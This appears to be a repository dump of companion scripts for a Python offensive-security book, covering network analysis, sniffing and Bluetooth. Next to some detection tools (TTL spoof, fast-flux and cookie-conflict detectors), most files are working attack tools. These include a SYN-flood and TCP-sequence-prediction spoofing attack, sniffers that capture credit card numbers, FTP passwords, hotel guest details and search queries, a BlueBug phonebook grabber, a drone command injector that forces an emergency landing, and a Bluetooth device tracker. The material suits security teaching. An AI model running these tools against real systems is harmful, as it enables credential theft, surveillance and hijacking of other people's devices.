54 |             dst = socket.inet_ntoa(ip.dst)
55 |             tcp = ip.data
56 |             dport = tcp.dport
57 |             if dport == 80:
58 |                 stream = src + ':' + dst
59 |                 if pktCount.has_key(stream):
60 |                     pktCount[stream] = pktCount[stream] + 1
61 |                 else:
62 |                     pktCount[stream] = 1
63 |         except:
64 |             pass
65 | 
66 |     for stream in pktCount:
67 |         pktsSent = pktCount[stream]
68 |         if pktsSent > THRESH:
69 |             src = stream.split(':')[0]
70 |             dst = stream.split(':')[1]
71 |             print '[+] '+src+' attacked '+dst+' with ' \
72 |                 + str(pktsSent) + ' pkts.'
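# Caveat: the assignment to THRESH inside main() below lacks a `global THRESH`
# declaration, so the -t option only rebinds a local name and findAttack()
# keeps comparing against the module-level default of 1000. 6-spoofDetect.py
# repeats the same pattern with its default of 5.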
73 | 74 | 75 | def main(): 76 | parser = optparse.OptionParser("usage %prog '+\ 77 | '-p -t " 78 | ) 79 | parser.add_option('-p', dest='pcapFile', type='string',\ 80 | help='specify pcap filename') 81 | parser.add_option('-t', dest='thresh', type='int',\ 82 | help='specify threshold count ') 83 | 84 | (options, args) = parser.parse_args() 85 | if options.pcapFile == None: 86 | print parser.usage 87 | exit(0) 88 | if options.thresh != None: 89 | THRESH = options.thresh 90 | pcapFile = options.pcapFile 91 | f = open(pcapFile) 92 | pcap = dpkt.pcap.Reader(f) 93 | findDownload(pcap) 94 | findHivemind(pcap) 95 | findAttack(pcap) 96 | 97 | 98 | if __name__ == '__main__': 99 | main() 100 | -------------------------------------------------------------------------------- /CH4/6-spoofDetect.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import time 4 | import optparse 5 | from scapy.all import * 6 | from IPy import IP as IPTEST 7 | 8 | ttlValues = {} 9 | THRESH = 5 10 | 11 | 12 | def checkTTL(ipsrc, ttl): 13 | if IPTEST(ipsrc).iptype() == 'PRIVATE': 14 | return 15 | 16 | if not ttlValues.has_key(ipsrc): 17 | pkt = sr1(IP(dst=ipsrc) / ICMP(), \ 18 | retry=0, timeout=1, verbose=0) 19 | ttlValues[ipsrc] = pkt.ttl 20 | 21 | if abs(int(ttl) - int(ttlValues[ipsrc])) > THRESH: 22 | print '\n[!] Detected Possible Spoofed Packet From: '\ 23 | + ipsrc 24 | print '[!] TTL: ' + ttl + ', Actual TTL: ' \ 25 | + str(ttlValues[ipsrc]) 26 | 27 | 28 | def testTTL(pkt): 29 | try: 30 | if pkt.haslayer(IP): 31 | ipsrc = pkt.getlayer(IP).src 32 | ttl = str(pkt.ttl) 33 | checkTTL(ipsrc, ttl) 34 | except: 35 | 36 | pass 37 | 38 | 39 | def main(): 40 | parser = optparse.OptionParser("usage %prog "+\ 41 | "-i -t ") 42 | parser.add_option('-i', dest='iface', type='string',\ 43 | help='specify network interface') 44 | parser.add_option('-t', dest='thresh', type='int', 45 | help='specify threshold count ') 46 | 47 | (options, args) = parser.parse_args() 48 | if options.iface == None: 49 | conf.iface = 'eth0' 50 | else: 51 | conf.iface = options.iface 52 | if options.thresh != None: 53 | THRESH = options.thresh 54 | else: 55 | THRESH = 5 56 | 57 | sniff(prn=testTTL, store=0) 58 | 59 | 60 | if __name__ == '__main__': 61 | main() 62 | -------------------------------------------------------------------------------- /CH4/7-testFastFlux.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | from scapy.all import * 4 | 5 | dnsRecords = {} 6 | 7 | def handlePkt(pkt): 8 | if pkt.haslayer(DNSRR): 9 | rrname = pkt.getlayer(DNSRR).rrname 10 | rdata = pkt.getlayer(DNSRR).rdata 11 | if dnsRecords.has_key(rrname): 12 | if rdata not in dnsRecords[rrname]: 13 | dnsRecords[rrname].append(rdata) 14 | else: 15 | dnsRecords[rrname] = [] 16 | dnsRecords[rrname].append(rdata) 17 | 18 | 19 | def main(): 20 | pkts = rdpcap('fastFlux.pcap') 21 | for pkt in pkts: 22 | handlePkt(pkt) 23 | 24 | for item in dnsRecords: 25 | print '[+] '+item+' has '+str(len(dnsRecords[item])) \ 26 | + ' unique IPs.' 
27 | 28 | 29 | if __name__ == '__main__': 30 | main() 31 | -------------------------------------------------------------------------------- /CH4/8-testDomainFlux.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | from scapy.all import * 4 | 5 | 6 | def dnsQRTest(pkt): 7 | if pkt.haslayer(DNSRR) and pkt.getlayer(UDP).sport == 53: 8 | rcode = pkt.getlayer(DNS).rcode 9 | qname = pkt.getlayer(DNSQR).qname 10 | if rcode == 3: 11 | print '[!] Name request lookup failed: ' + qname 12 | return True 13 | else: 14 | return False 15 | 16 | 17 | def main(): 18 | unAnsReqs = 0 19 | pkts = rdpcap('domainFlux.pcap') 20 | for pkt in pkts: 21 | if dnsQRTest(pkt): 22 | unAnsReqs = unAnsReqs + 1 23 | print '[!] '+str(unAnsReqs)+' Total Unanswered Name Requests' 24 | 25 | 26 | if __name__ == '__main__': 27 | main() 28 | -------------------------------------------------------------------------------- /CH4/9-mitnickAttack.py: -------------------------------------------------------------------------------- 1 | import optparse 2 | from scapy.all import * 3 | 4 | 5 | def synFlood(src, tgt): 6 | for sport in range(1024,65535): 7 | IPlayer = IP(src=src, dst=tgt) 8 | TCPlayer = TCP(sport=sport, dport=513) 9 | pkt = IPlayer / TCPlayer 10 | send(pkt) 11 | 12 | 13 | def calTSN(tgt): 14 | seqNum = 0 15 | preNum = 0 16 | diffSeq = 0 17 | 18 | for x in range(1, 5): 19 | if seqNum != 0: 20 | preNum = seqNum 21 | pkt = IP(dst=tgt) / TCP() 22 | ans = sr1(pkt, verbose=0) 23 | seqNum = ans.getlayer(TCP).seq 24 | diffSeq = seqNum - preNum 25 | print '[+] TCP Seq Difference: ' + str(diffSeq) 26 | return seqNum + diffSeq 27 | 28 | 29 | def spoofConn(src, tgt, ack): 30 | IPlayer = IP(src=src, dst=tgt) 31 | TCPlayer = TCP(sport=513, dport=514) 32 | synPkt = IPlayer / TCPlayer 33 | send(synPkt) 34 | 35 | IPlayer = IP(src=src, dst=tgt) 36 | TCPlayer = TCP(sport=513, dport=514, ack=ack) 37 | ackPkt = IPlayer / TCPlayer 38 | send(ackPkt) 39 | 40 | 41 | def main(): 42 | parser = optparse.OptionParser('usage %prog '+\ 43 | '-s <src for SYN flood> -S <src for spoofed connection> '+\ 44 | '-t <target address>') 45 | parser.add_option('-s', dest='synSpoof', type='string',\ 46 | help='specify src for SYN Flood') 47 | parser.add_option('-S', dest='srcSpoof', type='string',\ 48 | help='specify src for spoofed connection') 49 | parser.add_option('-t', dest='tgt', type='string',\ 50 | help='specify target address') 51 | (options, args) = parser.parse_args() 52 | 53 | if options.synSpoof == None or options.srcSpoof == None \ 54 | or options.tgt == None: 55 | print parser.usage 56 | exit(0) 57 | else: 58 | synSpoof = options.synSpoof 59 | srcSpoof = options.srcSpoof 60 | tgt = options.tgt 61 | 62 | print '[+] Starting SYN Flood to suppress remote server.' 63 | synFlood(synSpoof, srcSpoof) 64 | print '[+] Calculating correct TCP Sequence Number.' 65 | seqNum = calTSN(tgt) + 1 66 | print '[+] Spoofing Connection.' 67 | spoofConn(srcSpoof, tgt, seqNum) 68 | print '[+] Done.'
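# Annotation (editor's sketch, not part of the original book code): calTSN()
# above exploits hosts whose TCP initial sequence numbers grow by a constant
# per connection, so the next ISN is predictable from the last observed
# delta (the weakness the Mitnick attack relied on). A hypothetical compact
# equivalent that samples a few ISNs and differences the final pair:
def calTSNCompact(tgt, samples=4):
    seqNums = []
    for x in range(samples):
        ans = sr1(IP(dst=tgt) / TCP(), verbose=0)
        seqNums.append(ans.getlayer(TCP).seq)
    return seqNums[-1] + (seqNums[-1] - seqNums[-2])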
69 | 70 | 71 | if __name__ == '__main__': 72 | main() 73 | -------------------------------------------------------------------------------- /CH4/attack.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH4/attack.pcap -------------------------------------------------------------------------------- /CH4/domainFlux.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH4/domainFlux.pcap -------------------------------------------------------------------------------- /CH4/download.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH4/download.pcap -------------------------------------------------------------------------------- /CH4/fastFlux.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH4/fastFlux.pcap -------------------------------------------------------------------------------- /CH4/geotest.kml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 110.8.88.36 6 | 7 | 127.500000,37.000000 8 | 9 | 10 | 11 | 188.39.7.79 12 | 13 | -0.093100,51.514200 14 | 15 | 16 | 17 | 28.38.166.8 18 | 19 | -82.998800,39.961200 20 | 21 | 22 | 23 | 21.133.59.224 24 | 25 | -82.998800,39.961200 26 | 27 | 28 | 29 | 153.117.22.211 30 | 31 | -97.278200,37.752100 32 | 33 | 34 | 35 | 138.88.201.132 36 | 37 | -76.580600,38.344800 38 | 39 | 40 | 41 | 1.103.102.104 42 | 43 | 127.500000,37.000000 44 | 45 | 46 | 47 | 166.123.95.157 48 | 49 | -77.041700,38.897900 50 | 51 | 52 | 53 | 219.173.149.77 54 | 55 | 140.533300,40.633300 56 | 57 | 58 | 59 | 8.155.194.116 60 | 61 | -97.000000,38.000000 62 | 63 | 64 | 65 | 215.60.119.128 66 | 67 | -82.998800,39.961200 68 | 69 | 70 | 71 | 133.115.139.226 72 | 73 | 138.000000,36.000000 74 | 75 | 76 | 77 | 137.153.2.196 78 | 79 | 139.751400,35.685000 80 | 81 | 82 | 83 | 217.30.118.1 84 | 85 | -3.200000,55.950000 86 | 87 | 88 | 89 | 63.77.163.212 90 | 91 | -97.000000,38.000000 92 | 93 | 94 | 95 | 57.70.59.157 96 | 97 | 145.256000,-37.974000 98 | 99 | 100 | 101 | 89.233.181.180 102 | 103 | 14.466700,50.083300 104 | 105 | 106 | 107 | 108 | 109 | -------------------------------------------------------------------------------- /CH4/geotest.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH4/geotest.pcap -------------------------------------------------------------------------------- /CH4/hivemind.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH4/hivemind.pcap -------------------------------------------------------------------------------- /CH5/.DS_Store: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH5/.DS_Store -------------------------------------------------------------------------------- /CH5/1-testSniff.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | from scapy.all import * 5 | 6 | 7 | def pktPrint(pkt): 8 | if pkt.haslayer(Dot11Beacon): 9 | print '[+] Detected 802.11 Beacon Frame' 10 | elif pkt.haslayer(Dot11ProbeReq): 11 | print '[+] Detected 802.11 Probe Request Frame' 12 | elif pkt.haslayer(TCP): 13 | print '[+] Detected a TCP Packet' 14 | elif pkt.haslayer(DNS): 15 | print '[+] Detected a DNS Packet' 16 | 17 | 18 | conf.iface = 'mon0' 19 | sniff(prn=pktPrint) 20 | -------------------------------------------------------------------------------- /CH5/10-iphoneFinder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | from scapy.all import * 5 | from bluetooth import * 6 | 7 | 8 | def retBtAddr(addr): 9 | btAddr=str(hex(int(addr.replace(':', ''), 16) + 1))[2:] 10 | btAddr=btAddr[0:2]+":"+btAddr[2:4]+":"+btAddr[4:6]+":"+\ 11 | btAddr[6:8]+":"+btAddr[8:10]+":"+btAddr[10:12] 12 | return btAddr 13 | 14 | def checkBluetooth(btAddr): 15 | btName = lookup_name(btAddr) 16 | if btName: 17 | print '[+] Detected Bluetooth Device: ' + btName 18 | else: 19 | print '[-] Failed to Detect Bluetooth Device.' 20 | 21 | 22 | def wifiPrint(pkt): 23 | iPhone_OUI = 'd0:23:db' 24 | if pkt.haslayer(Dot11): 25 | wifiMAC = pkt.getlayer(Dot11).addr2 26 | if iPhone_OUI == wifiMAC[:8]: 27 | print '[*] Detected iPhone MAC: ' + wifiMAC 28 | btAddr = retBtAddr(wifiMAC) 29 | print '[+] Testing Bluetooth MAC: ' + btAddr 30 | checkBluetooth(btAddr) 31 | 32 | 33 | conf.iface = 'mon0' 34 | sniff(prn=wifiPrint) 35 | -------------------------------------------------------------------------------- /CH5/11-rfcommScan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | from bluetooth import * 5 | 6 | 7 | def rfcommCon(addr, port): 8 | sock = BluetoothSocket(RFCOMM) 9 | try: 10 | sock.connect((addr, port)) 11 | print '[+] RFCOMM Port ' + str(port) + ' open' 12 | sock.close() 13 | except Exception, e: 14 | print '[-] RFCOMM Port ' + str(port) + ' closed' 15 | 16 | 17 | for port in range(1, 30): 18 | rfcommCon('00:16:38:DE:AD:11', port) 19 | -------------------------------------------------------------------------------- /CH5/12-sdpScan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | from bluetooth import * 4 | 5 | 6 | def sdpBrowse(addr): 7 | services = find_service(address=addr) 8 | for service in services: 9 | name = service['name'] 10 | proto = service['protocol'] 11 | port = str(service['port']) 12 | print '[+] Found ' + str(name) + ' on ' + str(proto) + ':' + port 13 | 14 | 15 | sdpBrowse('00:16:38:DE:AD:11') 16 | -------------------------------------------------------------------------------- /CH5/13-ninjaPrint.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import obexftp 5 | 6 | try: 7 | btPrinter = obexftp.client(obexftp.BLUETOOTH) 8 | btPrinter.connect('00:16:38:DE:AD:11', 2) 9 | btPrinter.put_file('/tmp/ninja.jpg') 10 | print '[+] 
Printed Ninja Image.' 11 | except: 12 | 13 | print '[-] Failed to print Ninja Image.' 14 | -------------------------------------------------------------------------------- /CH5/14-blueBug.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import bluetooth 4 | 5 | tgtPhone = 'AA:BB:CC:DD:EE:FF' 6 | 7 | port = 17 8 | 9 | phoneSock = bluetooth.BluetoothSocket(bluetooth.RFCOMM) 10 | phoneSock.connect((tgtPhone, port)) 11 | 12 | for contact in range(1, 5): 13 | atCmd = 'AT+CPBR=' + str(contact) + '\n' 14 | phoneSock.send(atCmd) 15 | result = phoneSock.recv(1024) 16 | print '[+] ' + str(contact) + ' : ' + result 17 | 18 | phoneSock.close() 19 | -------------------------------------------------------------------------------- /CH5/2-creditSniff.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import re 4 | import optparse 5 | from scapy.all import * 6 | 7 | 8 | def findCreditCard(pkt): 9 | raw = pkt.sprintf('%Raw.load%') 10 | americaRE = re.findall('3[47][0-9]{13}', raw) 11 | masterRE = re.findall('5[1-5][0-9]{14}', raw) 12 | visaRE = re.findall('4[0-9]{12}(?:[0-9]{3})?', raw) 13 | 14 | if americaRE: 15 | print '[+] Found American Express Card: ' + americaRE[0] 16 | if masterRE: 17 | print '[+] Found MasterCard Card: ' + masterRE[0] 18 | if visaRE: 19 | print '[+] Found Visa Card: ' + visaRE[0] 20 | 21 | 22 | def main(): 23 | parser = optparse.OptionParser('usage %prog -i <interface>') 24 | parser.add_option('-i', dest='interface', type='string',\ 25 | help='specify interface to listen on') 26 | (options, args) = parser.parse_args() 27 | 28 | if options.interface == None: 29 | print parser.usage 30 | exit(0) 31 | else: 32 | conf.iface = options.interface 33 | 34 | try: 35 | print '[*] Starting Credit Card Sniffer.' 36 | sniff(filter='tcp', prn=findCreditCard, store=0) 37 | except KeyboardInterrupt: 38 | exit(0) 39 | 40 | 41 | if __name__ == '__main__': 42 | main() 43 | -------------------------------------------------------------------------------- /CH5/3-hotelSniff.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import optparse 5 | from scapy.all import * 6 | 7 | 8 | def findGuest(pkt): 9 | raw = pkt.sprintf('%Raw.load%') 10 | name = re.findall('(?i)LAST_NAME=(.*)&', raw) 11 | room = re.findall("(?i)ROOM_NUMBER=(.*)'", raw) 12 | if name: 13 | print '[+] Found Hotel Guest ' + str(name[0])+\ 14 | ', Room #' + str(room[0]) 15 | 16 | 17 | def main(): 18 | parser = optparse.OptionParser('usage %prog '+\ 19 | '-i <interface>') 20 | parser.add_option('-i', dest='interface',\ 21 | type='string', help='specify interface to listen on') 22 | (options, args) = parser.parse_args() 23 | 24 | if options.interface == None: 25 | print parser.usage 26 | exit(0) 27 | else: 28 | conf.iface = options.interface 29 | 30 | try: 31 | print '[*] Starting Hotel Guest Sniffer.'
32 | sniff(filter='tcp', prn=findGuest, store=0) 33 | except KeyboardInterrupt: 34 | exit(0) 35 | 36 | 37 | if __name__ == '__main__': 38 | main() 39 | -------------------------------------------------------------------------------- /CH5/4-googleSniff.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import optparse 4 | from scapy.all import * 5 | 6 | 7 | def findGoogle(pkt): 8 | if pkt.haslayer(Raw): 9 | payload = pkt.getlayer(Raw).load 10 | if 'GET' in payload: 11 | if 'google' in payload: 12 | r = re.findall(r'(?i)\&q=(.*?)\&', payload) 13 | if r: 14 | search = r[0].split('&')[0] 15 | search = search.replace('q=', '').\ 16 | replace('+', ' ').replace('%20', ' ') 17 | print '[+] Searched For: ' + search 18 | 19 | 20 | def main(): 21 | parser = optparse.OptionParser('usage %prog -i '+\ 22 | '') 23 | parser.add_option('-i', dest='interface', \ 24 | type='string', help='specify interface to listen on') 25 | (options, args) = parser.parse_args() 26 | 27 | if options.interface == None: 28 | print parser.usage 29 | exit(0) 30 | else: 31 | conf.iface = options.interface 32 | 33 | try: 34 | print '[*] Starting Google Sniffer.' 35 | sniff(filter='tcp port 80', prn=findGoogle) 36 | except KeyboardInterrupt: 37 | exit(0) 38 | 39 | 40 | if __name__ == '__main__': 41 | main() 42 | 43 | -------------------------------------------------------------------------------- /CH5/5-ftpSniff.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import optparse 5 | from scapy.all import * 6 | 7 | 8 | def ftpSniff(pkt): 9 | 10 | dest = pkt.getlayer(IP).dst 11 | raw = pkt.sprintf('%Raw.load%') 12 | user = re.findall('(?i)USER (.*)', raw) 13 | pswd = re.findall('(?i)PASS (.*)', raw) 14 | 15 | if user: 16 | print '[*] Detected FTP Login to ' + str(dest) 17 | print '[+] User account: ' + str(user[0]) 18 | elif pswd: 19 | print '[+] Password: ' + str(pswd[0]) 20 | 21 | 22 | def main(): 23 | parser = optparse.OptionParser('usage %prog '+\ 24 | '-i ') 25 | parser.add_option('-i', dest='interface', \ 26 | type='string', help='specify interface to listen on') 27 | (options, args) = parser.parse_args() 28 | 29 | if options.interface == None: 30 | print parser.usage 31 | exit(0) 32 | else: 33 | conf.iface = options.interface 34 | 35 | try: 36 | sniff(filter='tcp port 21', prn=ftpSniff) 37 | except KeyboardInterrupt: 38 | exit(0) 39 | 40 | 41 | if __name__ == '__main__': 42 | main() 43 | 44 | 45 | -------------------------------------------------------------------------------- /CH5/6-sniffHidden.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import sys 4 | from scapy.all import * 5 | 6 | interface = 'mon0' 7 | 8 | hiddenNets = [] 9 | unhiddenNets = [] 10 | 11 | def sniffDot11(p): 12 | 13 | if p.haslayer(Dot11ProbeResp): 14 | addr2 = p.getlayer(Dot11).addr2 15 | if (addr2 in hiddenNets) & (addr2 not in unhiddenNets): 16 | netName = p.getlayer(Dot11ProbeResp).info 17 | print '[+] Decloaked Hidden SSID : ' +\ 18 | netName + ' for MAC: ' + addr2 19 | unhiddenNets.append(addr2) 20 | 21 | if p.haslayer(Dot11Beacon): 22 | if p.getlayer(Dot11Beacon).info == '': 23 | addr2 = p.getlayer(Dot11).addr2 24 | if addr2 not in hiddenNets: 25 | print '[-] Detected Hidden SSID: ' +\ 26 | 'with MAC:' + addr2 27 | hiddenNets.append(addr2) 28 | 29 | 30 | sniff(iface=interface, 
prn=sniffDot11) 31 | 32 | -------------------------------------------------------------------------------- /CH5/6-sniffProbe.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | from scapy.all import * 4 | 5 | interface = 'mon0' 6 | probeReqs = [] 7 | 8 | 9 | def sniffProbe(p): 10 | if p.haslayer(Dot11ProbeReq): 11 | netName = p.getlayer(Dot11ProbeReq).info 12 | if netName not in probeReqs: 13 | probeReqs.append(netName) 14 | print '[+] Detected New Probe Request: ' + netName 15 | 16 | 17 | sniff(iface=interface, prn=sniffProbe) 18 | 19 | -------------------------------------------------------------------------------- /CH5/7-dup.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | 3 | def dupRadio(pkt): 4 | rPkt=pkt.getlayer(RadioTap) 5 | version=rPkt.version 6 | pad=rPkt.pad 7 | present=rPkt.present 8 | notdecoded=rPkt.notdecoded 9 | nPkt = RadioTap(version=version,pad=pad,present=present,notdecoded=notdecoded) 10 | return nPkt 11 | 12 | def dupDot11(pkt): 13 | dPkt=pkt.getlayer(Dot11) 14 | subtype=dPkt.subtype 15 | Type=dPkt.type 16 | proto=dPkt.proto 17 | FCfield=dPkt.FCfield 18 | ID=dPkt.ID 19 | addr1=dPkt.addr1 20 | addr2=dPkt.addr2 21 | addr3=dPkt.addr3 22 | SC=dPkt.SC 23 | addr4=dPkt.addr4 24 | nPkt=Dot11(subtype=subtype,type=Type,proto=proto,FCfield=FCfield,ID=ID,addr1=addr1,addr2=addr2,addr3=addr3,SC=SC,addr4=addr4) 25 | return nPkt 26 | 27 | def dupSNAP(pkt): 28 | sPkt=pkt.getlayer(SNAP) 29 | oui=sPkt.OUI 30 | code=sPkt.code 31 | nPkt=SNAP(OUI=oui,code=code) 32 | return nPkt 33 | 34 | def dupLLC(pkt): 35 | lPkt=pkt.getlayer(LLC) 36 | dsap=lPkt.dsap 37 | ssap=lPkt.ssap 38 | ctrl=lPkt.ctrl 39 | nPkt=LLC(dsap=dsap,ssap=ssap,ctrl=ctrl) 40 | return nPkt 41 | 42 | def dupIP(pkt): 43 | iPkt=pkt.getlayer(IP) 44 | version=iPkt.version 45 | tos=iPkt.tos 46 | ID=iPkt.id 47 | flags=iPkt.flags 48 | ttl=iPkt.ttl 49 | proto=iPkt.proto 50 | src=iPkt.src 51 | dst=iPkt.dst 52 | options=iPkt.options 53 | nPkt=IP(version=version,id=ID,tos=tos,flags=flags,ttl=ttl,proto=proto,src=src,dst=dst,options=options) 54 | return nPkt 55 | 56 | def dupUDP(pkt): 57 | uPkt=pkt.getlayer(UDP) 58 | sport=uPkt.sport 59 | dport=uPkt.dport 60 | nPkt=UDP(sport=sport,dport=dport) 61 | return nPkt 62 | 63 | -------------------------------------------------------------------------------- /CH5/7-uavSniff.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import threading 4 | import dup 5 | from scapy.all import * 6 | 7 | conf.iface = 'mon0' 8 | NAVPORT = 5556 9 | LAND = '290717696' 10 | EMER = '290717952' 11 | TAKEOFF = '290718208' 12 | 13 | 14 | class interceptThread(threading.Thread): 15 | 16 | def __init__(self): 17 | threading.Thread.__init__(self) 18 | self.curPkt = None 19 | self.seq = 0 20 | self.foundUAV = False 21 | 22 | def run(self): 23 | sniff(prn=self.interceptPkt, filter='udp port 5556') 24 | 25 | def interceptPkt(self, pkt): 26 | if self.foundUAV == False: 27 | print '[*] UAV Found.' 
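            # Annotation (editor's note, not part of the original code): the
            # first packet seen on UDP 5556 marks the AR.Drone control stream;
            # the lines below then parse the current AT-command sequence
            # number out of the payload so that injected commands can claim a
            # higher sequence and be accepted by the drone.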
28 | self.foundUAV = True 29 | self.curPkt = pkt 30 | raw = pkt.sprintf('%Raw.load%') 31 | try: 32 | self.seq = int(raw.split(',')[0].split('=')[-1]) + 5 33 | except: 34 | self.seq = 0 35 | 36 | def injectCmd(self, cmd): 37 | radio = dup.dupRadio(self.curPkt) 38 | dot11 = dup.dupDot11(self.curPkt) 39 | snap = dup.dupSNAP(self.curPkt) 40 | llc = dup.dupLLC(self.curPkt) 41 | ip = dup.dupIP(self.curPkt) 42 | udp = dup.dupUDP(self.curPkt) 43 | raw = Raw(load=cmd) 44 | injectPkt = radio / dot11 / llc / snap / ip / udp / raw 45 | sendp(injectPkt) 46 | 47 | def emergencyland(self): 48 | spoofSeq = self.seq + 100 49 | watch = 'AT*COMWDG=%i\r' %spoofSeq 50 | toCmd = 'AT*REF=%i,%s\r' % (spoofSeq + 1, EMER) 51 | self.injectCmd(watch) 52 | self.injectCmd(toCmd) 53 | 54 | def takeoff(self): 55 | spoofSeq = self.seq + 100 56 | watch = 'AT*COMWDG=%i\r' %spoofSeq 57 | toCmd = 'AT*REF=%i,%s\r' % (spoofSeq + 1, TAKEOFF) 58 | self.injectCmd(watch) 59 | self.injectCmd(toCmd) 60 | 61 | 62 | def main(): 63 | uavIntercept = interceptThread() 64 | uavIntercept.start() 65 | print '[*] Listening for UAV Traffic. Please WAIT...' 66 | while uavIntercept.foundUAV == False: 67 | pass 68 | 69 | while True: 70 | tmp = raw_input('[-] Press ENTER to Emergency Land UAV.') 71 | uavIntercept.emergencyland() 72 | 73 | if __name__ == '__main__': 74 | main() 75 | -------------------------------------------------------------------------------- /CH5/8-fireCatcher.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import re 5 | import optparse 6 | from scapy.all import * 7 | 8 | cookieTable = {} 9 | 10 | 11 | def fireCatcher(pkt): 12 | raw = pkt.sprintf('%Raw.load%') 13 | r = re.findall('wordpress_[0-9a-fA-F]{32}', raw) 14 | if r and 'Set' not in raw: 15 | if r[0] not in cookieTable.keys(): 16 | cookieTable[r[0]] = pkt.getlayer(IP).src 17 | print '[+] Detected and indexed cookie.' 
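        # Annotation (editor's note, not part of the original code): the first
        # sighting of a wordpress_<hash> session cookie pins that value to a
        # source IP; the elif below fires when the same cookie later arrives
        # from a different IP, i.e. a replayed (sidejacked) session of the
        # Firesheep variety.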
18 | elif cookieTable[r[0]] != pkt.getlayer(IP).src: 19 | print '[*] Detected Conflict for ' + r[0] 20 | print 'Victim = ' + cookieTable[r[0]] 21 | print 'Attacker = ' + pkt.getlayer(IP).src 22 | 23 | 24 | def main(): 25 | parser = optparse.OptionParser("usage %prog -i ") 26 | parser.add_option('-i', dest='interface', type='string',\ 27 | help='specify interface to listen on') 28 | (options, args) = parser.parse_args() 29 | 30 | if options.interface == None: 31 | print parser.usage 32 | exit(0) 33 | else: 34 | conf.iface = options.interface 35 | 36 | try: 37 | sniff(filter='tcp port 80', prn=fireCatcher) 38 | except KeyboardInterrupt: 39 | exit(0) 40 | 41 | 42 | if __name__ == '__main__': 43 | main() 44 | -------------------------------------------------------------------------------- /CH5/9-btFind.py: -------------------------------------------------------------------------------- 1 | import time 2 | from bluetooth import * 3 | from datetime import datetime 4 | 5 | def findTgt(tgtName): 6 | foundDevs = discover_devices(lookup_names=True) 7 | for (addr, name) in foundDevs: 8 | if tgtName == name: 9 | print '[*] Found Target Device ' + tgtName 10 | print '[+] With MAC Address: ' + addr 11 | print '[+] Time is: '+str(datetime.now()) 12 | 13 | 14 | tgtName = 'TJ iPhone' 15 | while True: 16 | print '[-] Scanning for Bluetooth Device: ' + tgtName 17 | findTgt(tgtName) 18 | time.sleep(5) 19 | 20 | -------------------------------------------------------------------------------- /CH5/9-btScan.py: -------------------------------------------------------------------------------- 1 | import time 2 | from bluetooth import * 3 | 4 | alreadyFound = [] 5 | 6 | 7 | def findDevs(): 8 | foundDevs = discover_devices(lookup_names=True) 9 | for (addr, name) in foundDevs: 10 | if addr not in alreadyFound: 11 | print '[*] Found Bluetooth Device: ' + str(name) 12 | print '[+] MAC address: ' + str(addr) 13 | alreadyFound.append(addr) 14 | 15 | 16 | while True: 17 | findDevs() 18 | time.sleep(5) 19 | 20 | 21 | -------------------------------------------------------------------------------- /CH5/dup.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | 3 | def dupRadio(pkt): 4 | rPkt=pkt.getlayer(RadioTap) 5 | version=rPkt.version 6 | pad=rPkt.pad 7 | present=rPkt.present 8 | notdecoded=rPkt.notdecoded 9 | nPkt = RadioTap(version=version,pad=pad,present=present,notdecoded=notdecoded) 10 | return nPkt 11 | 12 | def dupDot11(pkt): 13 | dPkt=pkt.getlayer(Dot11) 14 | subtype=dPkt.subtype 15 | Type=dPkt.type 16 | proto=dPkt.proto 17 | FCfield=dPkt.FCfield 18 | ID=dPkt.ID 19 | addr1=dPkt.addr1 20 | addr2=dPkt.addr2 21 | addr3=dPkt.addr3 22 | SC=dPkt.SC 23 | addr4=dPkt.addr4 24 | 